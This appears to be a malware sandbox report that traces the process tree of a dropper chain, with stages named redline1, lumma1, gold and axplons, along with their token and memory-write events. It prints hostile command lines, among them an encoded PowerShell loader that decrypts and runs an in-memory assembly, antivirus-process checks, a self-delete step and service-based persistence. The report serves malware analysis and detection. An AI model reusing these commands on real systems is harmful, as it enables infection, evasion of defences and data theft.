Token: SeDebugPrivilege	2200	tasklist.exe
Token: SeDebugPrivilege	1084	powershell.exe
Token: SeDebugPrivilege	3628	jsc.exe
Token: SeDebugPrivilege	1988	powershell.exe
Token: SeDebugPrivilege	2376	powershell.exe
Token: SeDebugPrivilege	5600	powershell.exe
Token: SeIncreaseQuotaPrivilege	5856	WMIC.exe
Token: SeSecurityPrivilege	5856	WMIC.exe
Token: SeTakeOwnershipPrivilege	5856	WMIC.exe
Token: SeLoadDriverPrivilege	5856	WMIC.exe
Token: SeSystemProfilePrivilege	5856	WMIC.exe
Token: SeSystemtimePrivilege	5856	WMIC.exe
Token: SeProfSingleProcessPrivilege	5856	WMIC.exe
Token: SeIncBasePriorityPrivilege	5856	WMIC.exe
Token: SeCreatePagefilePrivilege	5856	WMIC.exe
Token: SeBackupPrivilege	5856	WMIC.exe
Token: SeRestorePrivilege	5856	WMIC.exe
Token: SeShutdownPrivilege	5856	WMIC.exe
Token: SeDebugPrivilege	5856	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5856	WMIC.exe
Token: SeRemoteShutdownPrivilege	5856	WMIC.exe
Token: SeUndockPrivilege	5856	WMIC.exe
Token: SeManageVolumePrivilege	5856	WMIC.exe
Token: 33	5856	WMIC.exe
Token: 34	5856	WMIC.exe
Token: 35	5856	WMIC.exe
Token: 36	5856	WMIC.exe
Token: SeDebugPrivilege	5828	powershell.exe
Token: SeIncreaseQuotaPrivilege	5856	WMIC.exe
Token: SeSecurityPrivilege	5856	WMIC.exe
Token: SeTakeOwnershipPrivilege	5856	WMIC.exe
Token: SeLoadDriverPrivilege	5856	WMIC.exe
Token: SeSystemProfilePrivilege	5856	WMIC.exe
Token: SeSystemtimePrivilege	5856	WMIC.exe
Token: SeProfSingleProcessPrivilege	5856	WMIC.exe
Token: SeIncBasePriorityPrivilege	5856	WMIC.exe
Token: SeCreatePagefilePrivilege	5856	WMIC.exe
Token: SeBackupPrivilege	5856	WMIC.exe
Token: SeRestorePrivilege	5856	WMIC.exe
Token: SeShutdownPrivilege	5856	WMIC.exe
Token: SeDebugPrivilege	5856	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5856	WMIC.exe
Token: SeRemoteShutdownPrivilege	5856	WMIC.exe
Token: SeUndockPrivilege	5856	WMIC.exe
Token: SeManageVolumePrivilege	5856	WMIC.exe
Token: 33	5856	WMIC.exe
Token: 34	5856	WMIC.exe
Token: 35	5856	WMIC.exe
Token: 36	5856	WMIC.exe
Token: SeIncreaseQuotaPrivilege	6108	WMIC.exe
Token: SeSecurityPrivilege	6108	WMIC.exe
Token: SeTakeOwnershipPrivilege	6108	WMIC.exe
Token: SeLoadDriverPrivilege	6108	WMIC.exe

Suspicious use of FindShellTrayWindow 11 IoCs

pid	Process
4128	352215.exe
4344	Aviation.pif
4344	Aviation.pif
4344	Aviation.pif
1624	u310.1.exe
1624	u310.1.exe
1624	u310.1.exe
1624	u310.1.exe
1624	u310.1.exe
1624	u310.1.exe
1624	u310.1.exe

Suspicious use of SendNotifyMessage 10 IoCs

pid	Process
4344	Aviation.pif
4344	Aviation.pif
4344	Aviation.pif
1624	u310.1.exe
1624	u310.1.exe
1624	u310.1.exe
1624	u310.1.exe
1624	u310.1.exe
1624	u310.1.exe
1624	u310.1.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 232 wrote to memory of 4908	232	a9e8816a37ebe0d0af8eec1c019e2a70ba393eb9fc04842644a11934d3493aed.exe	81
PID 232 wrote to memory of 4908	232	a9e8816a37ebe0d0af8eec1c019e2a70ba393eb9fc04842644a11934d3493aed.exe	81
PID 232 wrote to memory of 4908	232	a9e8816a37ebe0d0af8eec1c019e2a70ba393eb9fc04842644a11934d3493aed.exe	81
PID 4908 wrote to memory of 688	4908	axplons.exe	82
PID 4908 wrote to memory of 688	4908	axplons.exe	82
PID 4908 wrote to memory of 688	4908	axplons.exe	82
PID 688 wrote to memory of 4812	688	alex.exe	83
PID 688 wrote to memory of 4812	688	alex.exe	83
PID 688 wrote to memory of 4812	688	alex.exe	83
PID 688 wrote to memory of 4812	688	alex.exe	83
PID 688 wrote to memory of 4812	688	alex.exe	83
PID 688 wrote to memory of 4812	688	alex.exe	83
PID 688 wrote to memory of 4812	688	alex.exe	83
PID 688 wrote to memory of 4812	688	alex.exe	83
PID 4812 wrote to memory of 3504	4812	RegAsm.exe	87
PID 4812 wrote to memory of 3504	4812	RegAsm.exe	87
PID 4812 wrote to memory of 3504	4812	RegAsm.exe	87
PID 4812 wrote to memory of 5040	4812	RegAsm.exe	88
PID 4812 wrote to memory of 5040	4812	RegAsm.exe	88
PID 4908 wrote to memory of 2624	4908	axplons.exe	90
PID 4908 wrote to memory of 2624	4908	axplons.exe	90
PID 4908 wrote to memory of 2624	4908	axplons.exe	90
PID 2624 wrote to memory of 3464	2624	gold.exe	92
PID 2624 wrote to memory of 3464	2624	gold.exe	92
PID 2624 wrote to memory of 3464	2624	gold.exe	92
PID 2624 wrote to memory of 2280	2624	gold.exe	93
PID 2624 wrote to memory of 2280	2624	gold.exe	93
PID 2624 wrote to memory of 2280	2624	gold.exe	93
PID 2624 wrote to memory of 2872	2624	gold.exe	94
PID 2624 wrote to memory of 2872	2624	gold.exe	94
PID 2624 wrote to memory of 2872	2624	gold.exe	94
PID 2624 wrote to memory of 2872	2624	gold.exe	94
PID 2624 wrote to memory of 2872	2624	gold.exe	94
PID 2624 wrote to memory of 2872	2624	gold.exe	94
PID 2624 wrote to memory of 2872	2624	gold.exe	94
PID 2624 wrote to memory of 2872	2624	gold.exe	94
PID 2624 wrote to memory of 2872	2624	gold.exe	94
PID 4908 wrote to memory of 2684	4908	axplons.exe	96
PID 4908 wrote to memory of 2684	4908	axplons.exe	96
PID 4908 wrote to memory of 2684	4908	axplons.exe	96
PID 4908 wrote to memory of 2712	4908	axplons.exe	97
PID 4908 wrote to memory of 2712	4908	axplons.exe	97
PID 4908 wrote to memory of 2712	4908	axplons.exe	97
PID 2712 wrote to memory of 4648	2712	install.exe	98
PID 2712 wrote to memory of 4648	2712	install.exe	98
PID 2712 wrote to memory of 4648	2712	install.exe	98
PID 4648 wrote to memory of 2992	4648	cmd.exe	100
PID 4648 wrote to memory of 2992	4648	cmd.exe	100
PID 4648 wrote to memory of 2992	4648	cmd.exe	100
PID 4648 wrote to memory of 2908	4648	cmd.exe	101
PID 4648 wrote to memory of 2908	4648	cmd.exe	101
PID 4648 wrote to memory of 2908	4648	cmd.exe	101
PID 4648 wrote to memory of 4672	4648	cmd.exe	102
PID 4648 wrote to memory of 4672	4648	cmd.exe	102
PID 4648 wrote to memory of 4672	4648	cmd.exe	102
PID 4648 wrote to memory of 4344	4648	cmd.exe	103
PID 4648 wrote to memory of 4344	4648	cmd.exe	103
PID 4648 wrote to memory of 4344	4648	cmd.exe	103
PID 4648 wrote to memory of 4476	4648	cmd.exe	104
PID 4648 wrote to memory of 4476	4648	cmd.exe	104
PID 4648 wrote to memory of 4476	4648	cmd.exe	104
PID 4648 wrote to memory of 448	4648	cmd.exe	105
PID 4648 wrote to memory of 448	4648	cmd.exe	105
PID 4648 wrote to memory of 448	4648	cmd.exe	105

C:\Users\Admin\AppData\Local\Temp\a9e8816a37ebe0d0af8eec1c019e2a70ba393eb9fc04842644a11934d3493aed.exe
"C:\Users\Admin\AppData\Local\Temp\a9e8816a37ebe0d0af8eec1c019e2a70ba393eb9fc04842644a11934d3493aed.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:232
- C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  "C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4908
- - C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
    "C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:688
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4812
    - - C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
        
        "C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"
        5⤵
        Executes dropped EXE
        Modifies system certificate store
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3504
    - - C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
        
        "C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5040
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
        5⤵
        
        PID:1036
      - C:\Windows\SysWOW64\choice.exe
        
        choice /C Y /N /D Y /T 3
        6⤵
        
        PID:232
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 688 -s 372
      4⤵
      Program crash
      PID:2456
- - C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe
    "C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:2624
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:3464
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:2280
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:2872
- - C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe
    "C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2684
  - - C:\Users\Admin\AppData\Local\Temp\enpl.exe
      "C:\Users\Admin\AppData\Local\Temp\enpl.exe"
      4⤵
      Executes dropped EXE
      PID:1496
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k move Organizations Organizations.cmd & Organizations.cmd & exit
        5⤵
        
        PID:932
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:1520
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa.exe opssvc.exe"
        6⤵
        
        PID:2280
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2200
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
        6⤵
        
        PID:4500
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 55234065
        6⤵
        
        PID:3016
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "EntityKnowStagesJamie" Promotional
        6⤵
        
        PID:3864
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b Enforcement + Orientation + Coach 55234065\f
        6⤵
        
        PID:4392
      - C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\55234065\Aviation.pif
        
        55234065\Aviation.pif 55234065\f
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:4344
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4344 -s 2228
        7⤵
        Program crash
        
        PID:2740
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4344 -s 2332
        7⤵
        Program crash
        
        PID:4920
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 5 127.0.0.1
        6⤵
        Runs ping.exe
        
        PID:3688
- - C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
    "C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    - Suspicious use of WriteProcessMemory
    PID:2712
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4648
    - - C:\Windows\SysWOW64\sc.exe
        
        Sc stop GameServerClient
        5⤵
        Launches sc.exe
        
        PID:2992
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameServerClient confirm
        5⤵
        Executes dropped EXE
        
        PID:2908
    - - C:\Windows\SysWOW64\sc.exe
        
        Sc delete GameSyncLink
        5⤵
        Launches sc.exe
        
        PID:4672
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameSyncLink confirm
        5⤵
        Executes dropped EXE
        
        PID:4344
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
        5⤵
        Executes dropped EXE
        
        PID:4476
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start GameSyncLink
        5⤵
        Executes dropped EXE
        
        PID:448
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "
      4⤵
      PID:484
    - - C:\Windows\SysWOW64\sc.exe
        
        Sc stop GameServerClientC
        5⤵
        Launches sc.exe
        
        PID:2784
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameServerClientC confirm
        5⤵
        Executes dropped EXE
        
        PID:3968
    - - C:\Windows\SysWOW64\sc.exe
        
        Sc delete PiercingNetLink
        5⤵
        Launches sc.exe
        
        PID:1512
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove PiercingNetLink confirm
        5⤵
        Executes dropped EXE
        
        PID:1676
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
        5⤵
        Executes dropped EXE
        
        PID:4068
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start PiercingNetLink
        5⤵
        Executes dropped EXE
        
        PID:2672
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "
      4⤵
      PID:5108
    - - C:\Windows\SysWOW64\sc.exe
        
        Sc delete GameSyncLinks
        5⤵
        Launches sc.exe
        
        PID:2720
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameSyncLinks confirm
        5⤵
        Executes dropped EXE
        
        PID:4684
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
        5⤵
        Executes dropped EXE
        
        PID:2264
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start GameSyncLinks
        5⤵
        Executes dropped EXE
        
        PID:3288
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
      4⤵
      PID:4060
- - C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe
    "C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:932
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      Loads dropped DLL
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      PID:3728
- - C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe
    "C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:4120
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:4736
- - C:\Users\Admin\AppData\Local\Temp\1000013001\file300un.exe
    "C:\Users\Admin\AppData\Local\Temp\1000013001\file300un.exe"
    3⤵
    - Executes dropped EXE
    PID:3280
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -EncodedCommand CgBmAHUAbgBjAHQAaQBvAG4AIAAdZ7GCFVn+YiAAewAKACAAIAAgACAAcABhAHIAYQBtACAAKAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJACFaLGCLAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJADgf/l6LAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJAA9hPZTCgAgACAAIAAgACkACgAKACAAIAAgACAAJADOmF17IAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQQBlAHMAXQA6ADoAQwByAGUAYQB0AGUAKAApAAoAIAAgACAAIAAkAM6YXXsuAE0AbwBkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwBpAHAAaABlAHIATQBvAGQAZQBdADoAOgBDAEIAQwAKACAAIAAgACAAJADOmF17LgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJAA1dDZ0IAA9ACAAJADOmF17LgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQAhWixgiwAIAAkAOB/+XopAAoAIAAgACAAIAAkANiY6pYgAD0AIAAkADV0NnQuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAD2E9lMsACAAMAAsACAAJAA9hPZTLgBMAGUAbgBnAHQAaAApAAoACgAgACAAIAAgACQAzphdey4ARABpAHMAcABvAHMAZQAoACkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJADYmOqWCgB9AAoACgAkAENosYIgAD0AIAAnAEMAOgBcAFwAVQBzAGUAcgBzAFwAXABBAGQAbQBpAG4AXABcAEEAcABwAEQAYQB0AGEAXABcAEwAbwBjAGEAbABcAFwAVABlAG0AcABcAFwAZgBpAGwAZQAtAHYAZgBsAHoAMwBiAHgANQAxAC4AdABtAHAAJwA7AAoAJACyg7GCIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAENosYIpADsACgAKACQAhWixgiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEMAMwAsADAAeAAyADEALAAwAHgARgBEACwAMAB4AEEARAAsADAAeAAxAEEALAAwAHgANQA0ACwAMAB4ADYARAAsADAAeAA2ADQALAAwAHgAQgBDACwAMAB4ADkARQAsADAAeAAzAEEALAAwAHgAQwBFACwAMAB4AEMAMAAsADAAeAA1AEQALAAwAHgAOQBCACwAMAB4AEMAMQAsADAAeAA3AEEALAAwAHgAOQA1ACwAMAB4ADgANAAsADAAeABGADUALAAwAHgARABCACwAMAB4ADcAMQAsADAAeABBADIALAAwAHgAMAAzACwAMAB4ADIAOAAsADAAeAAzAEYALAAwAHgARQBEACwAMAB4ADIAQwAsADAAeAA0ADAALAAwAHgARABEACwAMAB4ADUAMQAsADAAeAAxAEMAKQAKACQA4H/5eiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4ADAARQAsADAAeAA3ADkALAAwAHgAMQA1ACwAMAB4AEEAMQAsADAAeABEADkALAAwAHgAOQBBACwAMAB4ADMARgAsADAAeABGAEEALAAwAHgAMwA1ACwAMAB4ADEAQgAsADAAeAA5ADEALAAwAHgARgAzACwAMAB4ADQAMQAsADAAeABFADQALAAwAHgAMAA0ACwAMAB4ADMARQApAAoACgAkAD2E9lMgAD0AIAAdZ7GCFVn+YiAALQCFaLGCIAAkAIVosYIgAC0A4H/5eiAAJADgf/l6IAAtAD2E9lMgACQAsoOxggoACgAkALKEbFHxgiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQAPYT2UykAKQA7AAoAJADLeUNTIAA9ACAAJACyhGxR8YIuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAKACQAy3lDUy4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgAKAA=="
      4⤵
      PID:4952
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -EncodedCommand CgBmAHUAbgBjAHQAaQBvAG4AIAAdZ7GCFVn+YiAAewAKACAAIAAgACAAcABhAHIAYQBtACAAKAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJACFaLGCLAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJADgf/l6LAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJAA9hPZTCgAgACAAIAAgACkACgAKACAAIAAgACAAJADOmF17IAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQQBlAHMAXQA6ADoAQwByAGUAYQB0AGUAKAApAAoAIAAgACAAIAAkAM6YXXsuAE0AbwBkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwBpAHAAaABlAHIATQBvAGQAZQBdADoAOgBDAEIAQwAKACAAIAAgACAAJADOmF17LgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJAA1dDZ0IAA9ACAAJADOmF17LgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQAhWixgiwAIAAkAOB/+XopAAoAIAAgACAAIAAkANiY6pYgAD0AIAAkADV0NnQuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAD2E9lMsACAAMAAsACAAJAA9hPZTLgBMAGUAbgBnAHQAaAApAAoACgAgACAAIAAgACQAzphdey4ARABpAHMAcABvAHMAZQAoACkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJADYmOqWCgB9AAoACgAkAENosYIgAD0AIAAnAEMAOgBcAFwAVQBzAGUAcgBzAFwAXABBAGQAbQBpAG4AXABcAEEAcABwAEQAYQB0AGEAXABcAEwAbwBjAGEAbABcAFwAVABlAG0AcABcAFwAZgBpAGwAZQAtAHYAZgBsAHoAMwBiAHgANQAxAC4AdABtAHAAJwA7AAoAJACyg7GCIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAENosYIpADsACgAKACQAhWixgiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEMAMwAsADAAeAAyADEALAAwAHgARgBEACwAMAB4AEEARAAsADAAeAAxAEEALAAwAHgANQA0ACwAMAB4ADYARAAsADAAeAA2ADQALAAwAHgAQgBDACwAMAB4ADkARQAsADAAeAAzAEEALAAwAHgAQwBFACwAMAB4AEMAMAAsADAAeAA1AEQALAAwAHgAOQBCACwAMAB4AEMAMQAsADAAeAA3AEEALAAwAHgAOQA1ACwAMAB4ADgANAAsADAAeABGADUALAAwAHgARABCACwAMAB4ADcAMQAsADAAeABBADIALAAwAHgAMAAzACwAMAB4ADIAOAAsADAAeAAzAEYALAAwAHgARQBEACwAMAB4ADIAQwAsADAAeAA0ADAALAAwAHgARABEACwAMAB4ADUAMQAsADAAeAAxAEMAKQAKACQA4H/5eiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4ADAARQAsADAAeAA3ADkALAAwAHgAMQA1ACwAMAB4AEEAMQAsADAAeABEADkALAAwAHgAOQBBACwAMAB4ADMARgAsADAAeABGAEEALAAwAHgAMwA1ACwAMAB4ADEAQgAsADAAeAA5ADEALAAwAHgARgAzACwAMAB4ADQAMQAsADAAeABFADQALAAwAHgAMAA0ACwAMAB4ADMARQApAAoACgAkAD2E9lMgAD0AIAAdZ7GCFVn+YiAALQCFaLGCIAAkAIVosYIgAC0A4H/5eiAAJADgf/l6IAAtAD2E9lMgACQAsoOxggoACgAkALKEbFHxgiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQAPYT2UykAKQA7AAoAJADLeUNTIAA9ACAAJACyhGxR8YIuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAKACQAy3lDUy4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgAKAA==
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1084
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
        6⤵
        
        PID:3000
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
        6⤵
        
        PID:4300
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
        6⤵
        Drops startup file
        Suspicious use of AdjustPrivilegeToken
        
        PID:3628
        
        C:\Users\Admin\Pictures\ch6NfDG23wRpIy0nQE4DQJ8G.exe
        
        "C:\Users\Admin\Pictures\ch6NfDG23wRpIy0nQE4DQJ8G.exe"
        7⤵
        Executes dropped EXE
        
        PID:3924
        
        C:\Users\Admin\AppData\Local\Temp\u310.0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u310.0.exe"
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:2328
        
        C:\Users\Admin\AppData\Local\Temp\u310.1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u310.1.exe"
        8⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:1624
        
        C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
        9⤵
        
        PID:3588
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3924 -s 836
        8⤵
        Program crash
        
        PID:1924
        
        C:\Users\Admin\Pictures\A6DKueHXjjxUYRAziL7FqPpC.exe
        
        "C:\Users\Admin\Pictures\A6DKueHXjjxUYRAziL7FqPpC.exe"
        7⤵
        Executes dropped EXE
        
        PID:2200
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3424
        
        C:\Users\Admin\Pictures\A6DKueHXjjxUYRAziL7FqPpC.exe
        
